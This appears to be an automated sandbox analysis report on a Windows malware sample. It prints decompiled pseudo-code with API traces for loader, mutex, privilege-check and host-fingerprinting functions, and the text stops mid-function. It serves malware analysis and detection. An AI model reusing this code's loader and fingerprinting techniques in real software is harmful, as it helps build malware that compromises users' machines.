0x10001e76
0x10001e76
0x10001e3f
0x10001e8c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A,?), ref: 10001DCA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DE0
_snwprintf.NTDLL ref: 10001E05
CreateFileMappingW.KERNELBASE(000000FF,10004140,00000004,00000000,?,?), ref: 10001E2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E41
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001E55
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E6D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF), ref: 10001E76
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E7E

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 3e50b0ca96fbb660fa132a8ea15d9b9b0234b2ec6109b3d8873d61701b05dd08
Instruction ID: dbe4e35e6c100b16ed0acdc6d2f503e8b12c3812d0dbe5f01d31c7253bde5613
Opcode Fuzzy Hash: 3e50b0ca96fbb660fa132a8ea15d9b9b0234b2ec6109b3d8873d61701b05dd08
Instruction Fuzzy Hash: 71217CB2600158BFF711EFA8CC88EDF7BADEB483D0F118165FA15D7198DA3099458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6D4A, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FA6D4A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00FAAEEA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xfad230; // 0x2a9a5a8
				_t5 = _t13 + 0xfae84d; // 0x3a48df5
				_t6 = _t13 + 0xfae580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00FAAC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0xfad234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00fa6d4a
0x00fa6d52
0x00fa6d56
0x00fa6d5c
0x00fa6d61
0x00fa6d66
0x00fa6d69
0x00fa6d6c
0x00fa6d71
0x00fa6d72
0x00fa6d75
0x00fa6d7a
0x00fa6d81
0x00fa6d8b
0x00fa6d8d
0x00fa6d8e
0x00fa6d91
0x00fa6dad
0x00fa6db3
0x00fa6db7
0x00fa6e05
0x00fa6db9
0x00fa6dc6
0x00fa6dd6
0x00fa6dde
0x00fa6df0
0x00fa6df4
0x00000000
0x00000000
0x00fa6de0
0x00fa6de3
0x00fa6de8
0x00fa6dea
0x00fa6dea
0x00fa6dc8
0x00fa6dca
0x00fa6df6
0x00fa6df7
0x00fa6df7
0x00fa6dc6
0x00fa6e0c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00FA7115,?,00000001,?), ref: 00FA6D56
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00FA6D6C
_snwprintf.NTDLL ref: 00FA6D91
CreateFileMappingW.KERNELBASE(000000FF,00FAD234,00000004,00000000,00001000,?), ref: 00FA6DAD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115,?), ref: 00FA6DBF
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00FA6DD6
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115), ref: 00FA6DF7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115,?), ref: 00FA6DFF

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: c9f1579c43afb4f2b0e8d7140f797dca76c587c9c65c286935b25c220493570c
Instruction ID: 46d3f293d6fafaba035cda0bfeb530cca26b94cc3db1184173bcc18224da6a3c
Opcode Fuzzy Hash: c9f1579c43afb4f2b0e8d7140f797dca76c587c9c65c286935b25c220493570c
Instruction Fuzzy Hash: A821E7F6A40208FBD7119F58DC45F9E37A9AB46750F294060F601E71D0DB70D905EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001792(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x1000179b
0x100017a1
0x100017a8
0x100017ab
0x100018ac
0x100018b1
0x100018b1
0x100017b2
0x100017b5
0x100017ba
0x100017bd
0x100018ab
0x00000000
0x100018ab
0x100017c4
0x100017c4
0x100017c8
0x100017d0
0x100017d3
0x00000000
0x00000000
0x100017d9
0x100017e8
0x100017ed
0x100017ef
0x100017f2
0x100017f7
0x10001803
0x10001803
0x10001806
0x1000180a
0x10001890
0x10001890
0x10001893
0x10001898
0x1000189b
0x00000000
0x00000000
0x100018aa
0x00000000
0x100018aa
0x10001814
0x10001817
0x00000000
0x10001819
0x10001819
0x10001822
0x10001837
0x10001839
0x10001830
0x10001830
0x10001830
0x1000181b
0x1000181b
0x1000181b
0x1000183e
0x1000183e
0x10001841
0x10001843
0x10001843
0x1000184b
0x10001853
0x10001856
0x00000000
0x00000000
0x1000185a
0x1000185c
0x1000186a
0x1000186f
0x1000186f
0x10001878
0x1000187b
0x1000187e
0x10001882
0x00000000
0x10001884
0x1000188d
0x1000188d
0x00000000
0x1000188d
0x10001886
0x10001886
0x00000000
0x10001886
0x100017fb
0x100017fd
0x00000000
0x00000000
0x00000000
0x100017fd
0x100018a3
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 100017C8
lstrlenA.KERNEL32(00000002), ref: 100017DE
memset.NTDLL ref: 100017E8
GetProcAddress.KERNEL32(?,00000002), ref: 1000184B
lstrlenA.KERNEL32(-00000002), ref: 10001860
memset.NTDLL ref: 1000186A

Strings

~, xrefs: 100018A3

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 535752cf4838a6e0397bff52c85f66c34babbf5349c2da16149c6e0b63f83667
Instruction ID: aacf744330604d431cb8dcb6726508f1712f1da62006589e7fc56377ed95098c
Opcode Fuzzy Hash: 535752cf4838a6e0397bff52c85f66c34babbf5349c2da16149c6e0b63f83667
Instruction Fuzzy Hash: 0D314975A01215ABEB14CF59C890BEEB7F8FF44780F218029EC05EB249EB30EA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA707F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00FA707F(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00FA286D();
				if(_t27 != 0) {
					_t77 =  *0xfad214; // 0x2000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xfad214 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xfad134(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00FAA362( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xfad230; // 0x2a9a5a8
					_push(0xfad238);
					_push(1);
					_t7 = _t32 + 0xfae5bc; // 0x4d283a53
					 *0xfad234 = 0xc;
					 *0xfad23c = 0;
					L00FA7A28();
					_t36 = E00FA6D4A(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00FA8B98(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00FA550F(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xfad230; // 0x2a9a5a8
								_t18 = _t64 + 0xfae916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xfad284 = _t87;
						}
						_t38 = E00FA7890();
						 *0xfad228 =  *0xfad228 ^ 0xe8fa7dd7;
						 *0xfad278 = _t38;
						_t39 = E00FA550F(0x60);
						__eflags = _t39;
						 *0xfad2d4 = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xfad2d4; // 0x3a49630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xfad2d4; // 0x3a49630
							 *_t56 = 0xfae882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xfad1f0, _t84, 0x52);
							__eflags = _t42;
							 *0xfad270 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xfad214; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xfad230; // 0x2a9a5a8
								_t19 = _t76 + 0xfae212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xfac2bf);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00FA8B98( ~_v8 &  *0xfad228, 0xfad00c);
								_t84 = E00FA4D8D(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00FA9848(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00FA9C23(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00FA524A(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xfad130(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00FA8134(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00fa707f
0x00fa708a
0x00fa708d
0x00fa7090
0x00fa7093
0x00fa709a
0x00fa709c
0x00fa70a8
0x00fa70aa
0x00fa70aa
0x00fa70b3
0x00fa70bb
0x00fa70be
0x00fa70d8
0x00fa70dd
0x00fa70de
0x00fa70e0
0x00fa70e5
0x00fa70ea
0x00fa70ec
0x00fa70f3
0x00fa70fd
0x00fa7103
0x00fa7110
0x00fa7117
0x00fa711c
0x00fa711c
0x00fa7125
0x00fa714e
0x00fa7151
0x00fa715e
0x00fa7165
0x00fa7171
0x00fa7173
0x00fa7175
0x00fa717a
0x00fa7180
0x00fa7186
0x00fa718c
0x00fa718f
0x00fa7194
0x00fa719c
0x00fa719e
0x00fa719e
0x00fa71a1
0x00fa71a1
0x00fa71a7
0x00fa71ac
0x00fa71b4
0x00fa71b9
0x00fa71be
0x00fa71c0
0x00fa71c5
0x00fa71f4
0x00fa71c7
0x00fa71cc
0x00fa71d1
0x00fa71d6
0x00fa71dd
0x00fa71e3
0x00fa71e8
0x00fa71ee
0x00fa71ee
0x00fa71f5
0x00fa71f7
0x00fa7206
0x00fa720c
0x00fa720e
0x00fa7213
0x00fa723f
0x00fa7215
0x00fa7215
0x00fa721b
0x00fa7228
0x00fa722e
0x00fa722e
0x00fa7236
0x00fa7238
0x00fa7240
0x00fa7242
0x00fa7249
0x00fa7256
0x00fa7260
0x00fa7262
0x00fa7264
0x00000000
0x00000000
0x00fa7266
0x00fa726b
0x00fa726d
0x00fa7274
0x00fa7278
0x00fa727b
0x00fa7290
0x00fa7294
0x00fa7299
0x00000000
0x00fa7299
0x00fa727d
0x00fa727f
0x00000000
0x00000000
0x00fa7281
0x00fa728a
0x00fa728c
0x00fa728e
0x00000000
0x00000000
0x00000000
0x00fa728e
0x00fa7271
0x00fa7271
0x00fa7242
0x00fa7127
0x00fa7127
0x00fa712c
0x00fa729b
0x00fa729f
0x00fa72a7
0x00fa72a7
0x00000000
0x00fa729f
0x00fa7132
0x00fa7135
0x00fa7135
0x00fa7137
0x00fa713a
0x00fa7142
0x00fa7149
0x00000000
0x00fa72af
0x00fa72af
0x00fa72b2
0x00fa72b7
0x00fa72b7

APIs

Part of subcall function 00FA286D: GetModuleHandleA.KERNEL32(4C44544E,00000000,00FA7098,00000000,00000000,00000000,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA287C

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00FAD238,00000000), ref: 00FA7103
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA711C
wsprintfA.USER32 ref: 00FA719C
memset.NTDLL ref: 00FA71CC
RtlInitializeCriticalSection.NTDLL(03A495F0), ref: 00FA71DD
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00FA7206
wsprintfA.USER32 ref: 00FA7236

Part of subcall function 00FA8B98: GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BCF
Part of subcall function 00FA8B98: RtlAllocateHeap.NTDLL(00000000,00FA725B), ref: 00FA8BE6
Part of subcall function 00FA8B98: GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BF3
Part of subcall function 00FA8B98: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FA725B,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA8C14
Part of subcall function 00FA8B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C3B
Part of subcall function 00FA8B98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FA8C4F
Part of subcall function 00FA8B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C5C
Part of subcall function 00FA8B98: HeapFree.KERNEL32(00000000,00000000), ref: 00FA8C7A

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: f2f7d9d671c62c0387b3e4de15e5da11f2ad6c5051d85522c2a7251c1d2442f0
Instruction ID: c8431b36316512616e9a5db48bb0edf45af1a4a9ce72068f55d35d7575daa2ed
Opcode Fuzzy Hash: f2f7d9d671c62c0387b3e4de15e5da11f2ad6c5051d85522c2a7251c1d2442f0
Instruction Fuzzy Hash: A151ABF1E44219ABDB20EBA8DC45FAE73E8AB47720F144455F906E7250D778DD01BBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6E28, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA6E28(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xfad214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00FA550F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00FAA07B(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00fa6e35
0x00fa6e3c
0x00fa6e43
0x00fa6e57
0x00fa6e62
0x00fa6e7a
0x00fa6e87
0x00fa6e8a
0x00fa6e8f
0x00fa6e9a
0x00fa6e9e
0x00fa6ead
0x00fa6eb1
0x00fa6ecd
0x00fa6ecd
0x00fa6ed1
0x00fa6ed1
0x00fa6ed6
0x00fa6eda
0x00fa6ee0
0x00fa6ee1
0x00fa6ee8
0x00fa6eee

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00FA6E5A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00FA6E7A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FA6E8A
CloseHandle.KERNEL32(00000000), ref: 00FA6EDA

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00FA6EAD
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00FA6EB5
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00FA6EC5

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: b6fcac268f93800f88064332215fbcb76dd9241a3b4daf4dd7f1ba95d1e56b8b
Instruction ID: f761d130f771f4c721b1ed65993dcff6989c8eaf26726a17e8d5eda2a3df4c57
Opcode Fuzzy Hash: b6fcac268f93800f88064332215fbcb76dd9241a3b4daf4dd7f1ba95d1e56b8b
Instruction Fuzzy Hash: 2B2159B9D0021DFFEB009F90DC84EEEBBB9EB0A314F0440A5F511A2161C7718E05EB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000146A, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E1000154A, E10001413(_a12, 0, 0x10004118, _t41), 0,  &_a8); // executed
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x1000146d
0x10001479
0x1000147b
0x1000147e
0x100014f8
0x100014fe
0x10001500
0x10001502
0x10001508
0x1000150a
0x1000150f
0x10001512
0x1000151d
0x1000151f
0x00000000
0x00000000
0x10001521
0x10001524
0x10001526
0x00000000
0x00000000
0x00000000
0x10001526
0x1000152e
0x1000152e
0x1000153a
0x1000153a
0x10001480
0x10001481
0x100014a1
0x100014a7
0x100014a9
0x100014ae
0x100014ee
0x100014ee
0x100014b0
0x100014b8
0x100014bf
0x100014d8
0x100014e0
0x100014e5
0x100014ea
0x00000000
0x100014ea
0x100014e5
0x100014ae
0x10001481
0x10001547

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 1000148C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100014A1
CreateThread.KERNEL32(00000000,00000000,1000154A,00000000,00000000,?), ref: 100014D8
InterlockedDecrement.KERNEL32(10004108), ref: 100014F8
SleepEx.KERNEL32(00000064,00000001), ref: 10001512
CloseHandle.KERNEL32 ref: 1000152E
HeapDestroy.KERNEL32 ref: 1000153A

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 370aab4b8a4ac52325a9400cd4fb625107d198b2f1120dfe025ddb2caed62d17
Instruction ID: 90dc2b76caf056f200fb84d904cc644a068ecf256bf027882881ad8a048a84c3
Opcode Fuzzy Hash: 370aab4b8a4ac52325a9400cd4fb625107d198b2f1120dfe025ddb2caed62d17
Instruction Fuzzy Hash: 0B21D1B1601115EBF701DF69CCC4AEA7BE8FB917D67128129F602D7168EB308E80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9A14, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00FA9A55
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FA9AD7
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FA9B16
SysFreeString.OLEAUT32(00000000), ref: 00FA9B38

Part of subcall function 00FA736F: SysAllocString.OLEAUT32(00FAC2C8), ref: 00FA73BF

SafeArrayDestroy.OLEAUT32(?), ref: 00FA9B8C
SysFreeString.OLEAUT32(?), ref: 00FA9B9A

Part of subcall function 00FA98B3: Sleep.KERNELBASE(000001F4), ref: 00FA98FB

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 3b4f8f98f620a3470dc45fb67f91de21fa9193180fb9655f6050b3c29beaee90
Instruction ID: 5d458326925f804b5d0aa844c911aa51b3ca2a2db052b267c68f5d25964310b1
Opcode Fuzzy Hash: 3b4f8f98f620a3470dc45fb67f91de21fa9193180fb9655f6050b3c29beaee90
Instruction Fuzzy Hash: 635130B6904209EFCB00DFA4D88489EB7B6FFC9350B148979E505EB220D775AE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001314(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
